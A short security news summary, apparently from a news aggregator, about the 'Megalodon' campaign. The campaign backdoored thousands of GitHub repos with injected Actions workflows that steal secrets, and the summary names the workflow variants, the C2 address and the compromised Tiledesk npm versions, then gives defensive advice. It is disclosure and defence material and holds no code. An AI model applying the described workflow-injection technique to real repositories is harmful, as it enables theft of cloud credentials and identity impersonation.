Megalodon: Mass GitHub Repo Backdooring via CI Workflows
Scored daily by a customisable AI persona to surface the most relevant engineering leadership news.
Critical vulnerability revelation about mass repo backdooring via CI workflows.
In the Megalodon campaign, an attacker pushed 5,718 malicious commits across 5,561 GitHub repos in six hours, forging identities like `build-bot` to inject GitHub Actions workflows. The mass variant (`SysDiag`) triggers on every push and pull request, while the targeted variant (`Optimize-Build`) uses `workflow_dispatch` for on-demand secret exfiltration—including AWS/GCP/Azure credentials, OIDC tokens, and SSH keys—to C2 at 216.126.225.129:8443. The attack spread via compromised Tiledesk npm package versions 2.18.6–2.18.12, originating from the legitimate maintainer's GitHub repo, not the npm account.
- Audit all GitHub Actions workflow permissions (especially `id-token: write`) and pin CI dependency versions to detect injection attacks like Megalodon.
For a platform/cloud engineer managing CI/CD and open-source dependencies, this attack demonstrates a critical supply chain vector where compromised GitHub repos inject malicious workflows that can exfiltrate cloud credentials and OIDC tokens, enabling full cloud identity impersonation.
safedepio